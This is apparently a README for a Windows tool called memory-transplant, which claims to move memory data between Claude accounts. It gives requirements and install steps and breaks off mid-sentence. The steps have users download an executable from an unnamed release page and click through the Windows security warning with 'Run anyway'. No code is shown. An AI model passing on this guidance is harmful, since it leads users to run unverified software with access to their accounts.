📦 What this is

memory-transplant is a Windows app for moving memory data between Claude accounts. It helps you keep your notes, context, and past memory in one place when you switch accounts.

Use it when you want to:

• move memory from one Claude account to another
• keep useful context after an account change
• save time on manual copy and paste
• keep your memory data under your control

🖥️ What you need

Before you start, check these items:

• Windows 10 or Windows 11
• A working internet connection
• Access to both Claude accounts
• Enough free disk space for the app and your exported files
• Permission to run apps from the folder you choose

For best results, use the latest version of Claude in your browser before you begin the transfer.

On that page, look for the latest release and download the Windows file. If you see more than one file, pick the one that matches your system, such as:

• a .exe file for direct use
• a .zip file if the app comes packed in a folder

🛠️ Install and set up

1. Open the release page.
2. Download the Windows version of memory-transplant.
3. If the file is in a .zip folder, right-click it and choose Extract All.
4. Open the extracted folder.
5. Double-click the app file to run it.
6. If Windows asks for permission, choose Run anyway or More info > Run anyway if you trust the file source.
7. Keep the app in a folder you can find later, such as Downloads or Desktop.

If the app opens in a new window, leave it open while you use
